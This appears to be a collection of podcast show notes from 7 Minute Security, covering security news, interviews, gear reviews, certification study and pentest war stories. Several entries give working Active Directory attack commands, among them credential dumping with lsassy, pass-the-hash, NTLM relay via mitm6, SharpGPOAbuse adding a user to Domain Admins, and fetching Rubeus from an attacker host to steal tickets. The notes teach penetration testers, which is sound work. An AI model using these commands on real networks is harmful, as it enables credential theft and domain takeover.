7 Minute Security

Today our good pal Christopher Fielder from Arctic Wolf is back for an interview three-peat! He joins Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I to talk about all things ransomware, including: How the Colonial Pipeline incident may have started from a weak VPN cred with no MFA. Silver lining (?) - they got some of the $ back. Was the federal government's response good enough? What should the government be doing to better handle and manage ransomware? Common ways ransomware gets in our environments, and some ways to NOT get ransomware'd: Use 2FA (make sure that all accounts are using it!) Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.President Have users that haven't logged in for X days get automatically locked out Train your users - consider Arctic Wolf's managed security awareness offering Detect early signs of compromise like Kerberoasting Lock down your DNS egress to only specific servers so that it doesn't run "wide open" Leverage good threat intel

Hey everybody, happy June! Our pal Joe is back to cover some great security stories with us, including: Peloton's leaky API Some Colonial Pipeline discussion (story 1, story 2) Amazon Sidewalk doesn't really share your Internet connection with neighbors/strangers. The Hacker News article doesn't do an awesome job of clearing that up either.

Today we're doing something new - a first impressions episode of Meraki networking gear. Note: this is not a sponsored episode, but rather a follow up to episode #460 where I talked about throwing all my UniFi gear into the ocean and replacing it with Meraki gear. At the end of that episode I asked if anybody was interested in a "first impressions" of the gear, and it turns out (at least 6) people are interested, so here we are! TLDL: Pros Super easy plug-and-play setup The mobile app can control just about everything - ports, SSIDs, Internet on/off timers and more! Verbose logging Top-notch support from experienced technicians Cons Cost! Big $$$ "Cloud only" - can't install this gear in a LAN-only configuration Client VPN is a bit clunky to setup

Hey friends! Today we're talking with Philippe Humeau, CEO of CrowdSec, which is "an open-source massively multiplayer firewall able to analyze visitor behavior & provide an adapted response to all kinds of attacks. It also leverages the crowd power to generate a global IP reputation database to protect the user network." I came into this interview not knowing much at all about CrowdSec, so I peppered Philippe with questions such as: What is CrowdSec? What problem does it solve? Who are your competitors? You're open source...so how do you make $? What's your five-year plan? You're dealing with a lot of data and metrics...how are you handling data privacy laws and concerns such as GDPR? What if I fall in love with CrowdSec and want to contribute to making it better? It was a really fun, transparent and energetic interview - hope you enjoy it!

Today we continue the series on eating your own security dog food! Specifically, we talk about: Keeping a log and procedure for sanitizing systems Keeping a log and procedure for provisioning systems A big "gotcha" to be aware of when using Windows system dropboxes - make sure your Windows user account doesn't expire, because Splashtop doesn't have any way to update it! To prevent this, set the account not to expire: wmic useraccount where "Name='LocalAdminAccount'" set PasswordExpires=false If you want more tips on building pentest dropboxes, check out this series Oh, and today's song that I sang obnoxiously is If I Were a Dog.

Hey everybody! I stayed in a hotel for the first time in over a year and boy oh boy...I hope I didn't get COVID from the bedsheets! Anyhow, on that journey I thought of some things that I think will help your business on the marketing/project management/sales side to be more successful and less annoying. DISCLAIMER: I have no formal training in these areas, but I've been on both sides of the table for a number of years, and I think I'm getting a better idea of what clients do and don't like during the sales process. These things include: Reduce layers of people complexity - don't have 17 of your people on the client intro/pitch call and then ghost them once they actually want to buy something! Keep project management just complicated enough - I like project management tools and spreadsheet task-trackers like Smartsheet but I'm trying to let the client lead as far as how much detail they need when tracking their projects. By default, we create a document with a high level map of project milestones, timelines and key contact information. We update that as often as the client likes. Personalize responses to Web leads - if you have an info@ or sales@ address for your business, I think you should personalize the response you give folks who write in. They wrote you for a reason! Don't just copy/paste some generic "Hey you wanted info about our company so here it is blah blah blah" response, that doesn't make people feel like you give a rip about their needs. Think of something personal to say in the reply. "Oh, I see you're in Minnesota. I'm a big Twins fan!" Something like that. Simple, easy and personal. Don't sign people up for junk without asking - in this episode I give an example of a vendor we looked at (but didn't select) for some services, and the company decided to automatically sign ups up for a bunch of electronic and paper mailings. That's super annoying! Don't stink at LinkedIn - in the last episode of this series, I told you about a guy who (to me) wins LinkedIn and the Internet because he sent me a personalized video LinkedIn invitation - it was awesome! Be more like that guy, and less like the mosquitoes who send invites like "Hi, I noticed you're human and figured we should be LinkedIn BFFs" and then sign you up for a non-stop barrage of sales pitches! Bug people "just enough" - if you've had an awesome scoping call for a potential project and the client has received and reviewed the SOW, stay in touch with them periodically - even if it feels like you're being ghosted.

Welp, I need another security certification like I needed a bunch to the retinas, but even after all the fun (and pain) of CRTP I couldn't help but sign up for the maiden voyage of Attacking and Defending Azure AD Cloud - a.k.a. CARTP. This cert comes to us from our friends over at Pentester Academy, and is all about pwning things in Azure AD which is mostly new ground for me. I this episode I talk about some of the TTPs covered in week 1 of this course, as well as: Likes: Courses offered on Saturday (I'm usually pooped for these sessions, but it's easier than taking time during the work week) Student portal - and especially the student guide! - is more polished, easy to read, and easy to copy/paste from. Dislikes: On Saturdays I'm a sleepy Brian. :-) I still wish the course was designed such that we would go through various hands-on-keyboard exercises with the instructor, not just watch. Use of Discord as main comms channel - it causes anxiety for me...too many blips and bloops and blurps with all the notifications. It's also frustrating that the instructor takes questions from Discord sometimes without repeating the question, thus making it hard to figure out what everybody was talking about if I watch the Zoom reply.

Hey friends! Today Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I talk about some of our favorite news stories, including: FBI removes hacker back doors NSA: 5 security bugs under active nation-state cyberattack Ubiquiti is accused of covering up a 'catastrophic' data breach — and it's not denying it. On a side note, enjoy our podcast about how we lost our love for Ubiquiti a while back: 7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean Codecov users warned after backdoor discovered in devops tool

Today our friend Christopher Fielder of Arctic Wolf joins us on the show again (check out his first appearance in episode #444 - this time to talk about the security journey, and how to start out in your "security diapers" and mature towards a stronger infosec program. Specifically, we talk about: When the company has one person in charge of IT/security, how can you start taking security seriously without burning this person out? First, it's probably a good idea to take note of what you have as far as people, tools and technology to help you meet your security goals. Early in this process, you should inventory what you have (see CIS controls) so you know what you need to protect. A few tools to help you get started: Nmap Rumble LanSweeper Witnessme As you go about any phase of your security journey, don't ever think "I'm good, I'm secure!" Quarterly/yearly vulnerability scans just won't cut it in today's threat landscape - especially your external network. Consider scanning it nightly to catch show-stoppers like Hafnium early) Limiting administrative privileges is SUPER important - but don't take our word for it, check out this report from Beyond Trust for some important stats like "...enforcing least privilege and removing admin rights eliminates 56% of critical Microsoft vulnerabilities." Install LAPS, because if an attacker gets local admin access everywhere, that's in many ways just as good as Domain Admin! Train your users on relevant security topics. Then train them again. Then....again. And after that? Again. There are many ways to conduct tabletop exercises. They don't have to be crazy technical. Start with the internal tech teams, practice some scenarios and get everybody loosened up. Then add the executives to those meetings so that everybody is more at ease. How do you know when it's time to ask for help from an outside security resource? Not sure what kind of shape your company's security posture is in? Check out Arctic Wolf's free security maturity assessment.

In the last two episodes of this series (#449 and #450) we've been diving into how to not only speed up the process of spinning up a DIY pentest dropbox, but how to automate nearly the entire build process! In today's episode we talk specifically about how to streamline the Windows 10 build process. As previously mentioned, this article is awesome for creating a core Win 10 answer file that will format C:, setup a local admin, login once to the configured desktop and then do whatever things you want it to do. Personally, I like having a single batch file get fired off that: Sets the timezone with tzutil /s "Central Standard Time" Stops the VM from falling asleep with powercfg.exe -change -standby-timeout-ac 0 Grabs and runs a PS file that does a ton of downloading and unzipping of files with: invoke-webrequest https://somesite/somefile.zip -outfile c:\somewhere\somefile.zip expand-archive c:\somewhere\somefile.zip -destinationpath "c:\somewhere\extracted\" Installs Windows updates with: Install-PackageProvider -name nuget -force Install-Module PSWindowsUpdate -force Import-Module PSWindowsUpdate Get-WindowsUpdate Install-WindowsUpdate -AcceptAll -IgnoreReboot Sets a new name for the machine: Write-Host "Picking a new name for this machine...you'll need to provide your admin pw to do so" Rename-Computer -LocalCredential administrator -PassThru Write-Host "New name accepted!" Does a set of actions depending on the IP range with this code (which sets the IP address to a variable and then does stuff if the machine sits in that subnet): $ip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1] f ($ip -like "192.168.0.*") { Invoke-Webrequest https://somesite/somefile.ps1 -OutFile c:\someplace\somefile.ps1 } Also, I talk in this episode about how I try to host these "seed" files as securely as possible using Amazon Lightsail instances, the built-in firewall, and LetsEncrypt.

Today we talk through our first engagement using Hak5 Key Croc to steal and exfil data. In the past, my internal monologue when a new Hak5 toy is released sounds like this: "I certainly don't need another Hak5 doo-dad! The last one didn't ever work that great, and ended up in a drawer full of past Hak5 doo-dads that didn't work that great." "Whaaaaat? A new cool and hip video for the INSERT_CATCHY_HAK5_TOOL_NAME is out? Pffft. I don't need that." 5 seconds go by... "Well it's just $100, shut up and take my money!" "It came in the mail today! It has a cool envelope and everything!" "Hrm, I followed the quick start video and 3 of the 10 steps don't work for me. I'll hit the forums. Huh, everybody seems to be having this problem. 5 days go by... "Neat! With a little help from SassyGal67 and StarWarsFreak_XXL on the forums, I hacked together my own fix for these issues. Now the core functionality of the device works, but the GUI is totally broken and you have to factory reset it with every use. Cool!" Deep breath. Tosses doo-dad in a drawer full of past Hak5 doo-dads that didn't work that great. So with all that said, was our experience with the Key Croc any different? Check out today's episode to find out!

OK I probably say this every time, but I'm gonna say it again: this tale of pwnage is my one of my favs - and not because of the tools/tradecraft, but because of why the company needed our help in the first place. I think I'd file this under the category of "rescue and recovery mission" more than a pentest, but it was a total blast. I also cover a few tangents, including how COVID shot #2 gave me nightmares about leprechauns and indirectly caused me to de-pants in front of a large Webinar audience.

Hey friends! Warning: this is not a "typical" 7MS episode where we try hard to deliver some level of security value. Instead, today is a big, fat, crybaby, first-world problems whine-fest about how I used to love my UniFi gear for many years, but then a few weeks ago I hit unhealthy levels of rage while working with it...and subsequently completely ripped it all out of the wall and threw it in a plastic bin. Let me say it one more time: if you don't like rants of rage, skip this episode and we'll see you next week!. If you want to hang in for this clown show, you'll be treated to some of the following highlights: How I did not pirate Boson NetSim How I fell in love with the Edge Router X as an up-and-coming network guru The schedule isn't up, but I'm speaking at Secure360 this year! My shiny new Dream Machine had a really fun issue where one morning Internet service was dead (even though config hadn't changed in weeks), and restoring the SAME config over the RUNNING config fixed the issue. Whaaahhhh? The Dream Machine GUI (at the time) doesn't have all the options one might need to stand up a site to site VPN. Neat. After a firmware update, my wifi started going down from 8:00 a.m. - 8:07 a.m. every morning. Were one of you hacking me? WERE ONE OF YOU HACKING ME! Once I got a BeaconHD, I got a new fun issue where if you were connected to it and submitted a wifi voucher, the Beacon wouldn't properly recognize it and let you on the Internet until about 5 minutes later. Guests loved that! And by "loved that" I mean "hated that." After upgrading UDM firmware again, a new nifty issue popped its head up which broke all my inter-VLAN rules. Yay! I threw hundreds of dollars at new UniFi switches and access points to solve all these problems, and everything worked perfectly (until it didn't).

Happy mid-March! Our good pal Gh0sthax joins us today for another hot dish of cyber news! Stories include: Microsoft Exchange cyber attack - Hacker News has a nice what we know so far story, but things have evolved really fast, so make sure you check Microsoft's primary advisory, the script to run on local servers and newer updates such as the recent one-click remediation for unsupported Exchange versions SonicWall zero day - yuck, looks like the SonicWall troubles we talked about recently were a true zero day. In contrast to the Exchange story, it looks like SonicWall's official response offers (frighteningly?) little by way of logs and forensics to tell if you were truly popped. Either way, be sure to patch! Hackers attempt to contaminate Florida town's water supply - the story itself is interesting, but the way it got picked up by some outlets seems to send the message of "TeamViewer = bad" but we think the true lessons learned here are: Out of date and/or unsupported OS = bad Weak credentials = bad Connecting this type of equipment directly to the Internet instead of MFA + VPN = bad CISA has a great breakdown of this incident as well. Webshell use has doubled since last year - this article brings back some happy/frustrating OSCP experiences. To better protect your org from being pwned with Web shells, check out NSA's list of vulnerabilities commonly exploited to plant web shells Some great feedback from the last cyber news episode - a podcast listener offered a different take on the "sudo bug that gives root access story" that we discussed last month.

Today we're super excited to share a featured interview with Tanya Janca of WeHackPurple! Tanya has been in software development from the moment she was of legal age to work in Canada - beginning by working with some huge companies (Nokia/Adobe) before falling in love with application security and eventually starting a company of her own. Gh0sthax and I sat down with Tanya over Zoom to discuss: How to overcome your fears and present at conferences, write blog posts and even start your own company! How to deal with online jackwagons who troll you online at conferences The importance of finding a mentor and mentoring others Also, here are a bunch of handy links and hashtags Tanya shares throughout the interview: Bob and Alice Learn Application Security - Tanya's book, available on Amazon Women of Security (WoSEC) We Hack Purple Podcast - weekly podcast with a diverse range of guests from all walks of infosec life We Hack Purple Community - "a Canadian company dedicated to helping anyone and everyone create secure software." Tanya's music on Spotify #CyberMentoringMonday - a hashtag that Tanya and other security professionals monitor to help people connect with cyber mentors InsiderPHd - has a safe space for bug bounty hunters to learn and collaborate WeAreHackerz - "You are welcome to join WeAreHackerz if you identify as a person of a marginalized gender, including but not limited to non-binary individuals, women (trans and cis), trans men, genderqueer, etc. We welcome members across all nationalities, races, religions, ages, or other characteristics that make each of us unique." Security in Color

Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence: Get a cmd.exe spun up in the context of your AD user account: runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe" Then get some important info in PowerView: Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win! Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win! Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access! Once you know where you have local admin access, lsassy is your friend: lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server Did you get an admin's NTLM hash from this dump? Then do this: crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED (Pwn3d!) FTW!

Hello friends! Today, Joe (Gh0sthax) and I complete our series on CRTP - Certified Red Team Professional - a really awesome pentesting training and exam based squarely on Microsoft tools and tradecraft. Specifically, Joe and I talk about: We don't think the training/exam is for beginners, despite how its advertised Both the lab PDF and PowerPoint have their own quirks - which may ultimately be teaching us not to be copy-and-paste jockeys, and instead build our own study guides and cheat sheets Don't let the training give you the idea that most pentests have a super fast escalation path to DA (ok yes sometimes they do, but usually we spend a LOT of hours working on escalation!) Watch the walkthrough videos. We repeat: WATCH THE WALKTHROUGH VIDEOS! Although not required, we highly recommend capturing all the flags laid out for you in the lab environment Know how to privesc - using multiple tools/methods It would be to your advantage to understand how to view/manipulate Active directory information in multiple ways You start the exam with no tools. So how will you be ready to upload/download tools into the exam environment so you make the most of your exam time? Tool X might give you wrong results - or none at all - in the lab. Do you have a backup tool Y and Z that can serve the same purpose? You want to be very good at Kerberos ticket crafting! Know all the mimikatz commands and switches and when to apply them

Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because: I got to use some of my new CRTP skills! Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users: Get-DomainUser -PreauthNotRequired Check for misconfigured LAPS installs with Get-LAPSPasswords! The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn + ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective! When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies! SharpShares is a cool way to find shares your account has access to. I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example: sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin! Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun! Armed with all the local admin passwords, I was able to run net use Q: \\VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)

Happy almost-mid-February! Today Gh0sthax cooked up some great news stories for us to chew on, including: Sudo bug gives root access to mass numbers of Linux systems! What the heck is hammering with GameStop stock? - this tweet does a great job of explaining it in plain English Solarwinds continues to be a gift that keeps on giving malware-laced gifts that people don't want Sonicwall was hacked using zero days in its own products. After recording this news segment, Sonicwall issued an updated statement on the situation

Today's featured interview is with Marcello Salvati of Black Hills Information Security. Marcello is a.k.a. byt3bl33d3r, and known for his many contributions to the security community. We here at 7MS first became familiar with his work after using CrackMapExec on our penetration tests, and today we sat down with Marcello to discuss: Brian's Chris Farley moment with Marcello Marcello's infosec origin story CrackMapExec, how it came to be, how it was named, and what's coming in the new version of CME Marcello's decision to create Porchetta Industries as a community to provide "support to open source infosec/hacking tool developers and helps them succeed with their own Github sponsorships." Marcello welcomes you to follow Porchetta Industries on Twitter and Discord. What does Marcello do when he's not pentesting and coding? And does he ever get tired of pentesting and coding? What the heck is Nim and why is Marcello so excited about OffensiveNim?

Hey everyone! Hope you're having a great week. Today Gh0sthax and I do a brain dump and recap of a cool (and mind-exploding) course we took last week called Enterprise Attacker Emulation and C2 Implant Development. In the tangent department, we also touch a bit on: The Fargo TV series Our upcoming interview with Marcello (a.k.a. byt3bl33d3r) from BHIS This Key and Peele sketch I just took my CRTP exam, which we've talked about a lot in the past 7MS is trying to up its pentest game by learning how to write beacons/implants. One project that's really cool in this respect is from MrUn1k0d3r

Today we talk about a cool product called Deep Freeze, which, as its name implies, can "freeze" your computer in a known/good/frozen state. Then you can do whatever the flip you want to the machine (install icky things, tamper with C:\windows, pack your browser full of shady plugins, and more!), and then just reboot to restore! Note: this is not a sponsored episode, but will probably sound like one because I really dig this product and think you might too :-)

Hey friends! We're continuing our series on pentest dropbox building - specifically playing off last week's episode where we started talking about automating the OS builds that go on our dropboxes. Today we'll zoom in a little closer and talk about some of the specific scripting we do to get a Windows 2019 Active Directory Domain Controller installed and updated so that it's ready to electronically punch in the face with some of your mad pentesting skills! Specifically, we talk about these awesome commands: tzutil /s "Central Standard Time" - this is handy to set the time zone of your server build powercfg.exe -change -standby-timeout-ac 0 will stop your VM from falling asleep Invoke-WebRequest "https://somesite/somefile.file" -OutFile "c:\some\path\somefile.file" is awesome for quickly downloading files you need. Couple it with Expand-Archive "C:\some\path\some.zip" "c:\path\to\where\you\want\to\extract\the\zip" to make auto-provisioning your toolkit even faster! Don't like it that Server Manager loves to rear its dumb head upon every login? Kill the task for it with Get-ScheduledTask -TaskName ServerManager | Disable-ScheduledTask -Verbose. Byeeeeee!!!! I love Chrome more than I love IE/Edge, so I auto install it with: $Path = $env:TEMP; $Installer = "chrome_installer.exe"; Invoke-WebRequest "http://dl.google.com/chrome/install/375.126/chrome_installer.exe" -OutFile $Path\$Installer; Start-Process -FilePath $Path\$Installer -Args "/silent /install" -Verb RunAs -Wait; Remove-Item $Path\$Installer Now get all the Windows updates! Install-PackageProvider -name nuget -force Install-Module PSWindowsUpdate -force Import-Module PSWindowsUpdate Get-WindowsUpdate Install-WindowsUpdate -AcceptAll -IgnoreReboot Then rename your machine: Write-Host "Picking a new name for this machine...you'll need to provide your admin pw to do so" Rename-Computer -LocalCredential administrator -PassThru Write-Host "New name accepted!" When you're ready to install Active Directory, you can grab the RSAT tools: Write-Host "Lets install the RSAT tooleeeage!" add-windowsfeature -name rsat-adds And then the AD domain services themselves: Write-Host "Now lets install the AD domain services!" add-windowsfeature ad-domain-services Then install the new forest: install-addsforest -domainname your.domain -installdns -DomainNetbiosName yourdomain

Happy new year! This episode continues our series on DIY pentest dropboxes with a focus on automation - specifically as it relates to automating the build of Windows 10, Windows Server 2019, Kali and Ubuntu VMs. Here's the resources I talk about in more detail on today's episode that helps make the automagic happen: Windows VMs This article from Windowscentral.com does a great job of walking you through building a Windows 10 unattended install. A key piece of the automation is the autounattend.xml file, which you can somewhat automatically build here, but I think you'll want to install the Windows System Image Manager to really get in the tech weeds and fully tweak that answer file. The handy AnyBurn utility will help you make ISOs out of your Windows 10 / Server 2019 customized builds. Ubuntu VMs I set out to build a Ubuntu 18.x box because Splashtop only supports a few Linux builds. I found a freakin' sweet project called Linux unattended installation that helps you build the preseed.cfg file (kind of like the Windows equivalent of an answer file). The area of preseed.cfg I've been spending hours dorking around with is: d-i preseed/late_command string \ Under this section you can customize things to your heart's content. For example, you could automatically pull down and install all OS packages/updates and a bunch of third party utils you want: in-target sh -c 'apt-get update'; \ in-target sh -c 'apt-get upgrade -y'; \ in-target sh -c 'apt-get install curl dnsrecon git net-tools nmap openssh-server open-vm-tools-desktop python3.8 python3-pip python-libpcap ubuntu-gnome-desktop unzip wget xsltproc -y'; \ Finally, the project provides a slick script that will wrap up your Ubuntu build plus an SSH key into a ready-to-go ISO: build-iso.sh ~/.ssh/id_rsa.pub ~/Desktop/My-kool-kustomized-Ubuntu.iso Awesome! Kali VMs There is some decent documentation on building a preseed.cfg file for Kali. But the best resource I found with some excellent prebuilt config file is this kali-preseed project. Once your seed file is built, it's super easy to simply host it on a machine in your network and let Kali pull it during install. For example, if you've got a Linux box with Python on the network at 192.168.0.7, just make a temporary folder with the preseed.cfg file in it and then run: sudo python3 -m http.server 80 Then, in your virtual environment, create a new VM and boot it to a Kali NetInstaller image. At the splash screen, hit Tab and it'll display a command line you can edit. Remove the line that says something like preseed/file=/cdrom/simple-cdd/default.preseed, add auto=true and then the URL path to your preseed file, such as url=http://192.168.0.7/preseed.cfg. The Kali will ask for a few questions, such as a username and hostname to configure, and then if you're watching your machine hosting preseed.cfg, you'll see your Kali machine grab the config file and take care of the rest from there! Got a better/cooler/funner/faster/awesomer way to do this type of automation? Let us know!

Today, Gh0sthax and I talk about week 3/4 of the CRTP - Certified Red Team Professional training, and how it's kicking our butts a bit. Key points include: We agree this is not a certification for folks who are new to pentesting Don't expect to be following along "live" with the instructor during the training sessions You'll need to do a flippin' ton of studying and practicing on your own in between the live sessions As you follow along with the lab exercises, some things won't work - and that might be by design, but the lab manual might not give you a heads-up. In those cases, be sure to check with your classmates in the Discord channel Problems popping shells? Hint: it might not be a problem with your tools...but with your network/firewalll config! The more PowerShell skills you can walk into this training with, the better. We've got to play with some tools that were new(ish) to us: PowerUpSQL - check out these awesome cheat sheets too! HeidiSQL Rubeus If you're an absolute rockstar in the pentest labs, don't think that you'll breeze right through the exam! Some pros of this training: fast-moving, super knowledgable instructor. Outstanding content. Super value for the dollar investment - arguably the best pentest training bang for the buck. The labs themselves are quite good and realistic. You get the recordings of the live sessions after they're complete. The course covers some defense against these attacks as well - great to have the blue team perspective! A few cons: the content might be too fast-moving. It can get easy to become "lost" and forget the objective of what each lab exercise is having you do. Lab manual doesn't necessarily match the PDF slides.

Merry Christmas! Happy holidays! Please enjoy the last cyber news edition of 2020, brought to us by our good pal Gh0stHax. Stories covered include: You've probably heard this by now, but FireEye had a breach that was truly sophisticated. Here's a really nice plain English breakdown of the situation for folks who may not be interested in the deep technical details. Chris Krebs, former CISA director, sues Trump campaign lawyer after death threats CSOOnline has a nice article on 4 security trends to watch for in 2021 which we may or may not agree with!

Today's episode continues part 1 of our series on the Certified Red Team Professional certification. Key points from today's episode include: It's probably a better idea to run Bloodhound on your local machine so you don't crush the student VM's resources Running Invoke-Command is one of my new favorite things. Check this post for a bunch of cheatsheet tips for running commands in PowerShell against other hosts. Silver, gold and skeleton key attacks in AD - are they awesome? Yes? Do I see myself using those in short-term pentest enagements? Meh. Wanna build a home lab to do some of these fun pentest stuff? Our buddy k3nundrum in Slack recommended we check out this. It looks awesome. And the devs of the tool have a video on it here. When you're popping shells and privs all over the place in the lab, it can be confusing to figure out which machines you have what privileges on. I like using the klist command. Or, from a mimikatz prompt, try kerberos::list /export.

Welp, I need another certification like I need a hole in the head, but that didn't stop me from signing up for the Certified Red Team Professional. So I've started a series on sharing what I'm learning as I proceed through the certification path. (We're also talking about this on the 7MS forums) Here are some of the highlights from week 1: Boy oh boy is PowerView handy for extracting juicy info out of Active Directory. It works well when served with a side order of the Microsoft signed DLL for the ActiveDirectory PowerShell module I wouldn't say this course is for beginners. You will get some high level intro to PowerShell, Active Directory and pentesting, but you will need to do a ton of self-study and banging around in the lab to fill in some skill gaps. When trying to pop a Jenkins box, I learned about a few new helpful tools I'd never played with before: HFS - simple HTTP file server Powercat - for catching shells! Then on a personal front, I have a few updates to share as well: The Thanksgiving surprise that brought tears to my eyes The new piece of exercise equipment in the Johnson household that made my wife reach for a barf bag A mysterious sound in the house that lead to the discovery of dead things over Thanksgiving break

Happy December! Today I virtually sat down with Christopher Fielder of Arctic Wolf, who started his career in security at 18 (I was just playing a lot of video games when I was that old)! Christopher has served in the Air Force, worked for a university and SANS, served for some three-letter organizations - and more! Christopher and I had a great chat about a variety of security topics, including: Threat hunting - why it's a term that means so many things to different people, how to get started in it and how to start building a threat hunting team Threat intel - its relationship to threat hunting, and how to make sense of the jillions of intel feeds out there Pentesting your MDR/SIEM - we talk about our gist on evaluating an MDR/SIEM, and how to throw some technical tests at these systems to figure out if they're worth the cost!

Happy Thanksgiving! While the turkey and pie settle in your belly, why not also digest some fantastic security news stories with our pal Gh0sthax? Today's stories include: It was another epic month of patching - both Threatpost and Krebs have great coverage of what you need to know. We don't support software pirating, but it's interesting that we just got a demo of Cobalt Strike spun up, and now the source code was leaked. Always download software updates from their source, not from not-so-trustworthy sources like random search results in Google and pop-up boxes. As a follow up to a story from last month, ransomware was not to blame for the death of a woman in Germany.

Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features: Great blue team tools alerting our customer to a lot of the stuff we were doing An EDR that we tried to beat up (but it beat us up instead) SharpGPOAbuse which we talked about extensively last week Separation of "everyday" accounts from privileged accounts Multi-factor authentication bypass! Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation. The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds: SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with: echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight. We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!

Hello friends! Sorry to be late with this episode (again) but we've been heads-down in a lot of cool security work, coming up for air when we can! Today's episode features: A little welcome music that is not the usual scatting of gibberish I torture you with Some cool tools I'm playing with in the lab that we'll do future episodes on in the future: DetectionLab to practice detecting all the bad things! BadBlood to dirty up your AD (your test AD with groups, computers, permissions, etc.). I wish the user import script would let you choose a list of bad passwords to assign the users, but you can also run it manually if you want. Cobalt Strike - we're doing a demo right now! Most of today's episode focuses on SharpGPOAbuse, a tool that can be used to abuse "generic write" access to GPOs (which you might identify after running BloodHound). Here's a sample syntax you could run: SharpGPOAbuse.exe --AddUserTask --TaskName "Totes Safe Windoze Updatez" --Author SAMPLECO\ADMINISTRATOR --Command "cmd.exe" --Arguments "/c net group \"Domain Admins\" SomeLowPrivUser /ADD DOMAIN" --GPOName "Name of GPO with Generic Write Access" This will push a ScheduledTasks.xml file to \\sample.company\Policies\LONG-STRING-REPRESENTING-THE-GPO-ID\User\Preferences\ScheduledTasks Now if you find that the task is not pushing correctly, it may be that SharpGPOAbuse.exe hasn't been able to update either the GPT.INI file (in the root of the GPO path) and/or the versionNumber value assigned to the GPO itself. If you need to adjust the versionNumber and GPT.INI value manually, definitely read this Microsoft article so you know how the number is generated and how to increment it properly. This flippin' sweet RastaMouse blog article also helped this click for me. If you can't seem to update versionNumber using the PowerShell in Rasta's article, you can also open up ADSI Edit and navigate to Default naming context > DC=your,DC=com > CN=System > CN=Policies > CN=LONG-STRING-REPRESENTING-THE-GPO-ID then get the properties of the folder, scroll down and manually adjust the value for versionNumber.

Hi! Sorry to be so late with this episode, but I'm excited to share with you another fun tale of pentest pwnage! Key points from today's episode include: We do not do these episodes to brag or put down any company about their security posture. We do do (heh, I said "do do") these episodes to share what we're learning about pentesting it helps you become a better network defender and/or offender! Early in an engagement it can be fruitful to run Pcredz to find goodies in the clear like hashes, CC numbers, SNMP traps and more! Run hashes right through the Hashes.org cracked Pwned Passwords list for more management-level impact on your efforts. Do the same with Kerberoastable accounts Once you've gotten a local or domain admin account, use CrackMapExec to dump a workstation's local hashes, then do something VERY important that I just learned this week (details in today's episode) to maybe get insta-DA!

Happy October and merry Halloween everybody! We're back with our buddy Joe "the machine" Skeen who is also now a Principal Security Engineer for 7MS! He's also working on a new cert, and speaking of certs, 7MS is now PCIP certified! Today's great cyber stories include: Azure AD is a single point of failure in many networks Ransomware sophistication continues to grow - as demonstrated in this story, this one and this one Ransomware such as Ryuk can go from phishing email to total domain domination in 5 hours or less Don't forget to patch - Microsoft remediated some doozies! Something like 0 patch looks particularly interesting to aid in your patching efforts (not a sponsor, but maybe some day ;-) P.S. We've got a Halloween Webinar coming up Friday with our friends at Netwrix - sign up and we'll see you there!

